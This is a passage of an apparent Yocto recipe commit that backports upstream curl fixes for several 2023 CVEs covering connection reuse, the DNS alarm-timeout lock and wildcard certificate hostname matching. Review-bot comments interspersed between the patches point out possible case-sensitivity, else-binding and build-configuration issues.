183@@ -98,9 +98,15 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
184 Curl_safecmp(data->issuercert, needle->issuercert) &&
185 Curl_safecmp(data->clientcert, needle->clientcert) &&
186 Curl_safecmp(data->random_file, needle->random_file) &&
187- Curl_safecmp(data->egdsocket, needle->egdsocket) &&
188+ Curl_safecmp(data->egdsocket, needle->egdsocket) &&
189+#ifdef USE_TLS_SRP
190+ !Curl_timestrcmp(data->username, needle->username) &&
191+ !Curl_timestrcmp(data->password, needle->password) &&
192+ (data->authtype == needle->authtype) &&
193+#endif
194 Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
195 Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
196+ Curl_safe_strcasecompare(data->CRLfile, needle->CRLfile) &&
197 Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
198 return TRUE;
199
200@@ -117,6 +123,9 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
201 dest->verifyhost = source->verifyhost;
202 dest->verifystatus = source->verifystatus;
203 dest->sessionid = source->sessionid;
204+#ifdef USE_TLS_SRP
205+ dest->authtype = source->authtype;
206+#endif
207
208 CLONE_STRING(CApath);
209 CLONE_STRING(CAfile);
210@@ -127,6 +136,11 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
211 CLONE_STRING(cipher_list);
212 CLONE_STRING(cipher_list13);
213 CLONE_STRING(pinned_key);
214+ CLONE_STRING(CRLfile);
215+#ifdef USE_TLS_SRP
216+ CLONE_STRING(username);
217+ CLONE_STRING(password);
218+#endif
219
220 return TRUE;
221 }
222@@ -142,6 +156,11 @@ void Curl_free_primary_ssl_config(struct ssl_primary_config* sslc)
223 Curl_safefree(sslc->cipher_list);
224 Curl_safefree(sslc->cipher_list13);
225 Curl_safefree(sslc->pinned_key);
226+ Curl_safefree(sslc->CRLfile);
227+#ifdef USE_TLS_SRP
228+ Curl_safefree(sslc->username);
229+ Curl_safefree(sslc->password);
230+#endif
231 }
232
233 #ifdef USE_SSL
234--
2352.25.1
236
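Review bot: In the `Curl_ssl_config_matches` hunk the added `CRLfile` test uses `Curl_safe_strcasecompare`, while the other file-path fields in the same expression (`issuercert`, `clientcert`, `random_file`, `egdsocket`) use the case-sensitive `Curl_safecmp`. On a case-sensitive filesystem two CRL paths that differ only in letter case would then count as the same TLS configuration when deciding on reuse. Unless there is a reason to follow the cipher-list style here, `Curl_safecmp(data->CRLfile, needle->CRLfile) &&` would match the neighbouring path checks. The function begins outside the hunk.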
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27535.patch b/meta/recipes-support/curl/curl/CVE-2023-27535.patch
new file mode 100644
index 0000000000..e38390a57c
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27535.patch
@@ -0,0 +1,170 @@
1From 8f4608468b890dce2dad9f91d5607ee7e9c1aba1 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Thu, 9 Mar 2023 17:47:06 +0100
4Subject: [PATCH] ftp: add more conditions for connection reuse
5
6Reported-by: Harry Sintonen
7Closes #10730
8
9Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2023-27535.patch?h=ubuntu/focal-security
10Upstream commit https://github.com/curl/curl/commit/8f4608468b890dce2dad9f91d5607ee7e9c1aba1]
11CVE: CVE-2023-27535
12Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
13---
14 lib/ftp.c | 30 ++++++++++++++++++++++++++++--
15 lib/ftp.h | 5 +++++
16 lib/setopt.c | 2 +-
17 lib/url.c | 16 +++++++++++++++-
18 lib/urldata.h | 4 ++--
19 5 files changed, 51 insertions(+), 6 deletions(-)
20
21diff --git a/lib/ftp.c b/lib/ftp.c
22index 31a34e8..7a82a74 100644
23--- a/lib/ftp.c
24+++ b/lib/ftp.c
25@@ -4059,6 +4059,10 @@ static CURLcode ftp_disconnect(struct connectdata *conn, bool dead_connection)
26 }
27
28 freedirs(ftpc);
29+ free(ftpc->account);
30+ ftpc->account = NULL;
31+ free(ftpc->alternative_to_user);
32+ ftpc->alternative_to_user = NULL;
33 free(ftpc->prevpath);
34 ftpc->prevpath = NULL;
35 free(ftpc->server_os);
36@@ -4326,11 +4330,31 @@ static CURLcode ftp_setup_connection(struct connectdata *conn)
37 struct Curl_easy *data = conn->data;
38 char *type;
39 struct FTP *ftp;
40+ struct ftp_conn *ftpc = &conn->proto.ftpc;
41
42- conn->data->req.protop = ftp = calloc(sizeof(struct FTP), 1);
43+ ftp = calloc(sizeof(struct FTP), 1);
44 if(NULL == ftp)
45 return CURLE_OUT_OF_MEMORY;
46
47+ /* clone connection related data that is FTP specific */
48+ if(data->set.str[STRING_FTP_ACCOUNT]) {
49+ ftpc->account = strdup(data->set.str[STRING_FTP_ACCOUNT]);
50+ if(!ftpc->account) {
51+ free(ftp);
52+ return CURLE_OUT_OF_MEMORY;
53+ }
54+ }
55+ if(data->set.str[STRING_FTP_ALTERNATIVE_TO_USER]) {
56+ ftpc->alternative_to_user =
57+ strdup(data->set.str[STRING_FTP_ALTERNATIVE_TO_USER]);
58+ if(!ftpc->alternative_to_user) {
59+ Curl_safefree(ftpc->account);
60+ free(ftp);
61+ return CURLE_OUT_OF_MEMORY;
62+ }
63+ }
64+ conn->data->req.protop = ftp;
65+
66 ftp->path = &data->state.up.path[1]; /* don't include the initial slash */
67
68 /* FTP URLs support an extension like ";type=<typecode>" that
69@@ -4366,7 +4390,9 @@ static CURLcode ftp_setup_connection(struct connectdata *conn)
70 /* get some initial data into the ftp struct */
71 ftp->transfer = FTPTRANSFER_BODY;
72 ftp->downloadsize = 0;
73- conn->proto.ftpc.known_filesize = -1; /* unknown size for now */
74+ ftpc->known_filesize = -1; /* unknown size for now */
75+ ftpc->use_ssl = data->set.use_ssl;
76+ ftpc->ccc = data->set.ftp_ccc;
77
78 return CURLE_OK;
79 }
80diff --git a/lib/ftp.h b/lib/ftp.h
81index 984347f..163dcb3 100644
82--- a/lib/ftp.h
83+++ b/lib/ftp.h
84@@ -116,6 +116,8 @@ struct FTP {
85 struct */
86 struct ftp_conn {
87 struct pingpong pp;
88+ char *account;
89+ char *alternative_to_user;
90 char *entrypath; /* the PWD reply when we logged on */
91 char **dirs; /* realloc()ed array for path components */
92 int dirdepth; /* number of entries used in the 'dirs' array */
93@@ -141,6 +143,9 @@ struct ftp_conn {
94 ftpstate state; /* always use ftp.c:state() to change state! */
95 ftpstate state_saved; /* transfer type saved to be reloaded after
96 data connection is established */
97+ unsigned char use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
98+ IMAP or POP3 or others! (type: curl_usessl)*/
99+ unsigned char ccc; /* ccc level for this connection */
100 curl_off_t retr_size_saved; /* Size of retrieved file saved */
101 char *server_os; /* The target server operating system. */
102 curl_off_t known_filesize; /* file size is different from -1, if wildcard
103diff --git a/lib/setopt.c b/lib/setopt.c
104index 4d96f6b..a91bb70 100644
105--- a/lib/setopt.c
106+++ b/lib/setopt.c
107@@ -2126,7 +2126,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
108 arg = va_arg(param, long);
109 if((arg < CURLUSESSL_NONE) || (arg >= CURLUSESSL_LAST))
110 return CURLE_BAD_FUNCTION_ARGUMENT;
111- data->set.use_ssl = (curl_usessl)arg;
112+ data->set.use_ssl = (unsigned char)arg;
113 break;
114
115 case CURLOPT_SSL_OPTIONS:
116diff --git a/lib/url.c b/lib/url.c
117index dfbde3b..f84375c 100644
118--- a/lib/url.c
119+++ b/lib/url.c
120@@ -1257,10 +1257,24 @@ ConnectionExists(struct Curl_easy *data,
121 }
122 }
123
124- if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
125+#ifdef USE_SSH
126+ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
127 if(!ssh_config_matches(needle, check))
128 continue;
129 }
130+#endif
131+#ifndef CURL_DISABLE_FTP
132+ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_FTP) {
133+ /* Also match ACCOUNT, ALTERNATIVE-TO-USER, USE_SSL and CCC options */
134+ if(Curl_timestrcmp(needle->proto.ftpc.account,
135+ check->proto.ftpc.account) ||
136+ Curl_timestrcmp(needle->proto.ftpc.alternative_to_user,
137+ check->proto.ftpc.alternative_to_user) ||
138+ (needle->proto.ftpc.use_ssl != check->proto.ftpc.use_ssl) ||
139+ (needle->proto.ftpc.ccc != check->proto.ftpc.ccc))
140+ continue;
141+ }
142+#endif
143
144 if(!needle->bits.httpproxy || (needle->handler->flags&PROTOPT_SSL) ||
145 needle->bits.tunnel_proxy) {
146diff --git a/lib/urldata.h b/lib/urldata.h
147index 168f874..51b793b 100644
148--- a/lib/urldata.h
149+++ b/lib/urldata.h
150@@ -1730,8 +1730,6 @@ struct UserDefined {
151 void *ssh_keyfunc_userp; /* custom pointer to callback */
152 enum CURL_NETRC_OPTION
153 use_netrc; /* defined in include/curl.h */
154- curl_usessl use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
155- IMAP or POP3 or others! */
156 long new_file_perms; /* Permissions to use when creating remote files */
157 long new_directory_perms; /* Permissions to use when creating remote dirs */
158 long ssh_auth_types; /* allowed SSH auth types */
159@@ -1851,6 +1849,8 @@ struct UserDefined {
160 BIT(http09_allowed); /* allow HTTP/0.9 responses */
161 BIT(mail_rcpt_allowfails); /* allow RCPT TO command to fail for some
162 recipients */
163+ unsigned char use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
164+ IMAP or POP3 or others! (type: curl_usessl)*/
165 };
166
167 struct Names {
168--
1692.25.1
170
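Review bot: In the `lib/url.c` hunk the SSH test becomes `else if` and the new FTP test is a second `else if`, and the context places them directly after the closing brace of the preceding block, which CVE-2023-27535-pre1.patch on this page shows to be `if(!(needle->handler->flags & PROTOPT_CREDSPERREQUEST))`. As applied by this patch alone, both comparisons would run only when that condition is false, so not for protocols that take the credentials-per-connection branch. CVE-2023-27536.patch later inserts an `if(...) continue;` in between, which re-binds the `else`, so the effective behaviour depends on patch order and on the `#ifdef` combination. Independent statements avoid that: `if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {` and likewise a plain `if` for the `PROTO_FAMILY_FTP` block. `ConnectionExists` extends beyond the hunk.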
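diff --git a/meta/recipes-support/curl/curl/CVE-2023-27536.patch b/meta/recipes-support/curl/curl/CVE-2023-27536.patch
new file mode 100644
index 0000000000..b04a77de25
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27536.patch
@@ -0,0 +1,55 @@
+From cb49e67303dbafbab1cebf4086e3ec15b7d56ee5 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Fri, 10 Mar 2023 09:22:43 +0100
+Subject: [PATCH] url: only reuse connections with same GSS delegation
+
+Reported-by: Harry Sintonen
+Closes #10731
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/cb49e67303dbafbab1cebf4086e3ec15b7d56ee5]
+CVE: CVE-2023-27536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/url.c | 6 ++++++
+ lib/urldata.h | 1 +
+ 2 files changed, 7 insertions(+)
+
+diff --git a/lib/url.c b/lib/url.c
+index f84375c..87f4eb0 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1257,6 +1257,11 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
++ /* GSS delegation differences do not actually affect every connection
++ and auth method, but this check takes precaution before efficiency */
++ if(needle->gssapi_delegation != check->gssapi_delegation)
++ continue;
++
+ #ifdef USE_SSH
+ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+ if(!ssh_config_matches(needle, check))
+@@ -1708,6 +1713,7 @@ static struct connectdata *allocate_conn(struct Curl_easy *data)
+ conn->fclosesocket = data->set.fclosesocket;
+ conn->closesocket_client = data->set.closesocket_client;
+ conn->lastused = Curl_now(); /* used now */
++ conn->gssapi_delegation = data->set.gssapi_delegation;
+
+ return conn;
+ error:
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 51b793b..b8a611b 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1118,6 +1118,7 @@ struct connectdata {
+ handle */
+ BIT(sock_accepted); /* TRUE if the SECONDARYSOCKET was created with
+ accept() */
++ long gssapi_delegation; /* inherited from set.gssapi_delegation */
+ };
+
+ /* The end of connectdata. */
+--
+2.25.1
+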
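diff --git a/meta/recipes-support/curl/curl/CVE-2023-27538.patch b/meta/recipes-support/curl/curl/CVE-2023-27538.patch
new file mode 100644
index 0000000000..6c40989d3b
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27538.patch
@@ -0,0 +1,31 @@
+From af369db4d3833272b8ed443f7fcc2e757a0872eb Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Fri, 10 Mar 2023 08:22:51 +0100
+Subject: [PATCH] url: fix the SSH connection reuse check
+
+Reported-by: Harry Sintonen
+Closes #10735
+
+CVE: CVE-2023-27538
+Upstream-Status: Backport [https://github.com/curl/curl/commit/af369db4d3833272b8ed443f7fcc2e757a0872eb]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/url.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 8da0245..9f14a7b 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1266,7 +1266,7 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
+- if(get_protocol_family(needle->handler->protocol) == PROTO_FAMILY_SSH) {
++ if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+ if(!ssh_config_matches(needle, check))
+ continue;
+ }
+--
+2.25.1
+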
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch b/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch
new file mode 100644
index 0000000000..eaa6fdc327
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch
@@ -0,0 +1,197 @@
1From f446258f0269a62289cca0210157cb8558d0edc3 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Tue, 16 May 2023 23:40:42 +0200
4Subject: [PATCH] hostip: include easy_lock.h before using
5 GLOBAL_INIT_IS_THREADSAFE
6
7Since that header file is the only place that define can be defined.
8
9Reported-by: Marc Deslauriers
10
11Follow-up to 13718030ad4b3209
12
13Closes #11121
14
15Upstream-Status: Backport [https://github.com/curl/curl/commit/f446258f0269a62289cca0210157cb8558d0edc3]
16CVE: CVE-2023-28320
17Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
18---
19 lib/easy_lock.h | 109 ++++++++++++++++++++++++++++++++++++++++++++++++
20 lib/hostip.c | 10 ++---
21 lib/hostip.h | 9 ----
22 3 files changed, 113 insertions(+), 15 deletions(-)
23 create mode 100644 lib/easy_lock.h
24
25diff --git a/lib/easy_lock.h b/lib/easy_lock.h
26new file mode 100644
27index 0000000..6399a39
28--- /dev/null
29+++ b/lib/easy_lock.h
30@@ -0,0 +1,109 @@
31+#ifndef HEADER_CURL_EASY_LOCK_H
32+#define HEADER_CURL_EASY_LOCK_H
33+/***************************************************************************
34+ * _ _ ____ _
35+ * Project ___| | | | _ \| |
36+ * / __| | | | |_) | |
37+ * | (__| |_| | _ <| |___
38+ * \___|\___/|_| \_\_____|
39+ *
40+ * Copyright (C) Daniel Stenberg, <daniel@haxx.se>, et al.
41+ *
42+ * This software is licensed as described in the file COPYING, which
43+ * you should have received as part of this distribution. The terms
44+ * are also available at https://curl.se/docs/copyright.html.
45+ *
46+ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
47+ * copies of the Software, and permit persons to whom the Software is
48+ * furnished to do so, under the terms of the COPYING file.
49+ *
50+ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
51+ * KIND, either express or implied.
52+ *
53+ * SPDX-License-Identifier: curl
54+ *
55+ ***************************************************************************/
56+
57+#include "curl_setup.h"
58+
59+#define GLOBAL_INIT_IS_THREADSAFE
60+
61+#if defined(_WIN32_WINNT) && _WIN32_WINNT >= 0x600
62+
63+#ifdef __MINGW32__
64+#ifndef __MINGW64_VERSION_MAJOR
65+#if (__MINGW32_MAJOR_VERSION < 5) || \
66+ (__MINGW32_MAJOR_VERSION == 5 && __MINGW32_MINOR_VERSION == 0)
67+/* mingw >= 5.0.1 defines SRWLOCK, and slightly different from MS define */
68+typedef PVOID SRWLOCK, *PSRWLOCK;
69+#endif
70+#endif
71+#ifndef SRWLOCK_INIT
72+#define SRWLOCK_INIT NULL
73+#endif
74+#endif /* __MINGW32__ */
75+
76+#define curl_simple_lock SRWLOCK
77+#define CURL_SIMPLE_LOCK_INIT SRWLOCK_INIT
78+
79+#define curl_simple_lock_lock(m) AcquireSRWLockExclusive(m)
80+#define curl_simple_lock_unlock(m) ReleaseSRWLockExclusive(m)
81+
82+#elif defined(HAVE_ATOMIC) && defined(HAVE_STDATOMIC_H)
83+#include <stdatomic.h>
84+#if defined(HAVE_SCHED_YIELD)
85+#include <sched.h>
86+#endif
87+
88+#define curl_simple_lock atomic_int
89+#define CURL_SIMPLE_LOCK_INIT 0
90+
91+/* a clang-thing */
92+#ifndef __has_builtin
93+#define __has_builtin(x) 0
94+#endif
95+
96+#ifndef __INTEL_COMPILER
97+/* The Intel compiler tries to look like GCC *and* clang *and* lies in its
98+ __has_builtin() function, so override it. */
99+
100+/* if GCC on i386/x86_64 or if the built-in is present */
101+#if ( (defined(__GNUC__) && !defined(__clang__)) && \
102+ (defined(__i386__) || defined(__x86_64__))) || \
103+ __has_builtin(__builtin_ia32_pause)
104+#define HAVE_BUILTIN_IA32_PAUSE
105+#endif
106+
107+#endif
108+
109+static inline void curl_simple_lock_lock(curl_simple_lock *lock)
110+{
111+ for(;;) {
112+ if(!atomic_exchange_explicit(lock, true, memory_order_acquire))
113+ break;
114+ /* Reduce cache coherency traffic */
115+ while(atomic_load_explicit(lock, memory_order_relaxed)) {
116+ /* Reduce load (not mandatory) */
117+#ifdef HAVE_BUILTIN_IA32_PAUSE
118+ __builtin_ia32_pause();
119+#elif defined(__aarch64__)
120+ __asm__ volatile("yield" ::: "memory");
121+#elif defined(HAVE_SCHED_YIELD)
122+ sched_yield();
123+#endif
124+ }
125+ }
126+}
127+
128+static inline void curl_simple_lock_unlock(curl_simple_lock *lock)
129+{
130+ atomic_store_explicit(lock, false, memory_order_release);
131+}
132+
133+#else
134+
135+#undef GLOBAL_INIT_IS_THREADSAFE
136+
137+#endif
138+
139+#endif /* HEADER_CURL_EASY_LOCK_H */
140diff --git a/lib/hostip.c b/lib/hostip.c
141index 5231a74..d5bf881 100644
142--- a/lib/hostip.c
143+++ b/lib/hostip.c
144@@ -68,6 +68,8 @@
145 #include "curl_memory.h"
146 #include "memdebug.h"
147
148+#include "easy_lock.h"
149+
150 #if defined(CURLRES_SYNCH) && \
151 defined(HAVE_ALARM) && \
152 defined(SIGALRM) && \
153@@ -77,10 +79,6 @@
154 #define USE_ALARM_TIMEOUT
155 #endif
156
157-#ifdef USE_ALARM_TIMEOUT
158-#include "easy_lock.h"
159-#endif
160-
161 #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */
162
163 /*
164@@ -259,8 +257,8 @@ void Curl_hostcache_prune(struct Curl_easy *data)
165 /* Beware this is a global and unique instance. This is used to store the
166 return address that we can jump back to from inside a signal handler. This
167 is not thread-safe stuff. */
168-sigjmp_buf curl_jmpenv;
169-curl_simple_lock curl_jmpenv_lock;
170+static sigjmp_buf curl_jmpenv;
171+static curl_simple_lock curl_jmpenv_lock;
172 #endif
173
174 /* lookup address, returns entry if found and not stale */
175diff --git a/lib/hostip.h b/lib/hostip.h
176index baf1e58..d7f73d9 100644
177--- a/lib/hostip.h
178+++ b/lib/hostip.h
179@@ -196,15 +196,6 @@ Curl_cache_addr(struct Curl_easy *data, Curl_addrinfo *addr,
180 #define CURL_INADDR_NONE INADDR_NONE
181 #endif
182
183-#ifdef HAVE_SIGSETJMP
184-/* Forward-declaration of variable defined in hostip.c. Beware this
185- * is a global and unique instance. This is used to store the return
186- * address that we can jump back to from inside a signal handler.
187- * This is not thread-safe stuff.
188- */
189-extern sigjmp_buf curl_jmpenv;
190-#endif
191-
192 /*
193 * Function provided by the resolver backend to set DNS servers to use.
194 */
195--
1962.25.1
197
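Review bot: `lib/easy_lock.h` keeps `GLOBAL_INIT_IS_THREADSAFE` only when `_WIN32_WINNT >= 0x600` or both `HAVE_ATOMIC` and `HAVE_STDATOMIC_H` are defined, and the diffstat lists no build-system file, so nothing in this patch defines those two macros. If the recipe's configure step does not provide them, the final `#else` undefines the macro and, per the condition added in CVE-2023-28320.patch on this page, `lib/hostip.c` builds without `USE_ALARM_TIMEOUT`, so the synchronous resolver would lose its timeout instead of gaining a lock. That outcome deserves a comment at the `#undef`, for example `/* no lock primitive: hostip.c then compiles without USE_ALARM_TIMEOUT */`, and a look at the generated `curl_config.h` for the target build. The spin-lock functions also pass `true`/`false`, which assumes `curl_setup.h` makes those names available.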
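diff --git a/meta/recipes-support/curl/curl/CVE-2023-28320.patch b/meta/recipes-support/curl/curl/CVE-2023-28320.patch
new file mode 100644
index 0000000000..0c9b67440a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28320.patch
@@ -0,0 +1,86 @@
+From 13718030ad4b3209a7583b4f27f683cd3a6fa5f2 Mon Sep 17 00:00:00 2001
+From: Harry Sintonen <sintonen@iki.fi>
+Date: Tue, 25 Apr 2023 09:22:26 +0200
+Subject: [PATCH] hostip: add locks around use of global buffer for alarm()
+
+When building with the sync name resolver and timeout ability we now
+require thread-safety to be present to enable it.
+
+Closes #11030
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/13718030ad4b3209a7583b4f27f683cd3a6fa5f2]
+CVE: CVE-2023-28320
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/hostip.c | 19 +++++++++++++++----
+ 1 file changed, 15 insertions(+), 4 deletions(-)
+
+diff --git a/lib/hostip.c b/lib/hostip.c
+index f5bb634..5231a74 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -68,12 +68,19 @@
+ #include "curl_memory.h"
+ #include "memdebug.h"
+
+-#if defined(CURLRES_SYNCH) && \
+- defined(HAVE_ALARM) && defined(SIGALRM) && defined(HAVE_SIGSETJMP)
++#if defined(CURLRES_SYNCH) && \
++ defined(HAVE_ALARM) && \
++ defined(SIGALRM) && \
++ defined(HAVE_SIGSETJMP) && \
++ defined(GLOBAL_INIT_IS_THREADSAFE)
+ /* alarm-based timeouts can only be used with all the dependencies satisfied */
+ #define USE_ALARM_TIMEOUT
+ #endif
+
++#ifdef USE_ALARM_TIMEOUT
++#include "easy_lock.h"
++#endif
++
+ #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */
+
+ /*
+@@ -248,11 +255,12 @@ void Curl_hostcache_prune(struct Curl_easy *data)
+ Curl_share_unlock(data, CURL_LOCK_DATA_DNS);
+ }
+
+-#ifdef HAVE_SIGSETJMP
++#ifdef USE_ALARM_TIMEOUT
+ /* Beware this is a global and unique instance. This is used to store the
+ return address that we can jump back to from inside a signal handler. This
+ is not thread-safe stuff. */
+ sigjmp_buf curl_jmpenv;
++curl_simple_lock curl_jmpenv_lock;
+ #endif
+
+ /* lookup address, returns entry if found and not stale */
+@@ -614,7 +622,6 @@ enum resolve_t Curl_resolv(struct connectdata *conn,
+ static
+ RETSIGTYPE alarmfunc(int sig)
+ {
+- /* this is for "-ansi -Wall -pedantic" to stop complaining! (rabe) */
+ (void)sig;
+ siglongjmp(curl_jmpenv, 1);
+ }
+@@ -695,6 +702,8 @@ enum resolve_t Curl_resolv_timeout(struct connectdata *conn,
+ This should be the last thing we do before calling Curl_resolv(),
+ as otherwise we'd have to worry about variables that get modified
+ before we invoke Curl_resolv() (and thus use "volatile"). */
++ curl_simple_lock_lock(&curl_jmpenv_lock);
++
+ if(sigsetjmp(curl_jmpenv, 1)) {
+ /* this is coming from a siglongjmp() after an alarm signal */
+ failf(data, "name lookup timed out");
+@@ -763,6 +772,8 @@ clean_up:
+ #endif
+ #endif /* HAVE_SIGACTION */
+
++ curl_simple_lock_unlock(&curl_jmpenv_lock);
++
+ /* switch back the alarm() to either zero or to what it was before minus
+ the time we spent until now! */
+ if(prev_alarm) {
+--
+2.25.1
+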
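Review bot: The lock taken just before `sigsetjmp()` is released only at `clean_up:`, so it is held for the whole blocking lookup, and `curl_jmpenv_lock` is a single process-wide instance. With the busy-waiting stdatomic variant of `curl_simple_lock_lock` from CVE-2023-28320-fol1.patch, every other thread that needs an alarm-timed lookup spins until the holder finishes or times out. That is the intended serialization of `curl_jmpenv`, but nothing states it; a comment at the lock call such as `/* serializes all alarm()-timed lookups in the process; held until clean_up */` would document the cost. The hunk does not show whether every path to `clean_up:` passes the lock call, so it is worth confirming that no `goto clean_up` precedes it.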
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28321.patch b/meta/recipes-support/curl/curl/CVE-2023-28321.patch
new file mode 100644
index 0000000000..da1d1fdcd6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28321.patch
@@ -0,0 +1,272 @@
1Upstream-Status: Backport [import from ubuntu curl_7.68.0-1ubuntu2.20 with
2minor change to tests/data/test1397 part so the patch can be apply.
3upstream: https://github.com/curl/curl/commit/199f2d440d8659b42 ]
4CVE: CVE-2023-28321
5Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
6
7This backport was obtained from SUSE.
8
9From 199f2d440d8659b42670c1b796220792b01a97bf Mon Sep 17 00:00:00 2001
10From: Daniel Stenberg <daniel@haxx.se>
11Date: Mon, 24 Apr 2023 21:07:02 +0200
12Subject: [PATCH] hostcheck: fix host name wildcard checking
13
14The leftmost "label" of the host name can now only match against single
15'*'. Like the browsers have worked for a long time.
16
17- extended unit test 1397 for this
18- move some SOURCE variables from unit/Makefile.am to unit/Makefile.inc
19
20Reported-by: Hiroki Kurosawa
21Closes #11018
22---
23 lib/hostcheck.c | 50 +++++++--------
24 tests/data/test1397 | 10 ++-
25 tests/unit/Makefile.am | 94 ----------------------------
26 tests/unit/Makefile.inc | 94 ++++++++++++++++++++++++++++
27 tests/unit/unit1397.c | 134 ++++++++++++++++++++++++----------------
28 5 files changed, 202 insertions(+), 180 deletions(-)
29
30--- a/lib/hostcheck.c
31+++ b/lib/hostcheck.c
32@@ -58,15 +58,19 @@
33 * apparent distinction between a name and an IP. We need to detect the use of
34 * an IP address and not wildcard match on such names.
35 *
36+ * Only match on "*" being used for the leftmost label, not "a*", "a*b" nor
37+ * "*b".
38+ *
39+ * @unittest: 1397
40+ *
41 * NOTE: hostmatch() gets called with copied buffers so that it can modify the
42 * contents at will.
43 */
44
45 static int hostmatch(char *hostname, char *pattern)
46 {
47- const char *pattern_label_end, *pattern_wildcard, *hostname_label_end;
48- int wildcard_enabled;
49- size_t prefixlen, suffixlen;
50+ const char *pattern_label_end, *hostname_label_end;
51+ size_t suffixlen;
52 struct in_addr ignored;
53 #ifdef ENABLE_IPV6
54 struct sockaddr_in6 si6;
55@@ -80,13 +84,12 @@ static int hostmatch(char *hostname, cha
56 if(pattern[len-1]=='.')
57 pattern[len-1] = 0;
58
59- pattern_wildcard = strchr(pattern, '*');
60- if(pattern_wildcard == NULL)
61+ if(strncmp(pattern, "*.", 2))
62 return strcasecompare(pattern, hostname) ?
63 CURL_HOST_MATCH : CURL_HOST_NOMATCH;
64
65 /* detect IP address as hostname and fail the match if so */
66- if(Curl_inet_pton(AF_INET, hostname, &ignored) > 0)
67+ else if(Curl_inet_pton(AF_INET, hostname, &ignored) > 0)
68 return CURL_HOST_NOMATCH;
69 #ifdef ENABLE_IPV6
70 if(Curl_inet_pton(AF_INET6, hostname, &si6.sin6_addr) > 0)
71@@ -95,14 +98,9 @@ static int hostmatch(char *hostname, cha
72
73 /* We require at least 2 dots in pattern to avoid too wide wildcard
74 match. */
75- wildcard_enabled = 1;
76 pattern_label_end = strchr(pattern, '.');
77- if(pattern_label_end == NULL || strchr(pattern_label_end + 1, '.') == NULL ||
78- pattern_wildcard > pattern_label_end ||
79- strncasecompare(pattern, "xn--", 4)) {
80- wildcard_enabled = 0;
81- }
82- if(!wildcard_enabled)
83+ if(pattern_label_end == NULL ||
84+ strchr(pattern_label_end + 1, '.') == NULL)
85 return strcasecompare(pattern, hostname) ?
86 CURL_HOST_MATCH : CURL_HOST_NOMATCH;
87
88@@ -117,11 +115,9 @@ static int hostmatch(char *hostname, cha
89 if(hostname_label_end - hostname < pattern_label_end - pattern)
90 return CURL_HOST_NOMATCH;
91
92- prefixlen = pattern_wildcard - pattern;
93- suffixlen = pattern_label_end - (pattern_wildcard + 1);
94- return strncasecompare(pattern, hostname, prefixlen) &&
95- strncasecompare(pattern_wildcard + 1, hostname_label_end - suffixlen,
96- suffixlen) ?
97+ suffixlen = pattern_label_end - (pattern + 1);
98+ return strncasecompare(pattern + 1, hostname_label_end - suffixlen,
99+ suffixlen) ?
100 CURL_HOST_MATCH : CURL_HOST_NOMATCH;
101 }
102
103--- a/tests/data/test1397
104+++ b/tests/data/test1397
105@@ -2,8 +2,7 @@
106 <info>
107 <keywords>
108 unittest
109-ssl
110-wildcard
111+Curl_cert_hostcheck
112 </keywords>
113 </info>
114
115@@ -16,9 +15,8 @@ none
116 <features>
117 unittest
118 </features>
119- <name>
120-Check wildcard certificate matching function Curl_cert_hostcheck
121- </name>
122+<name>
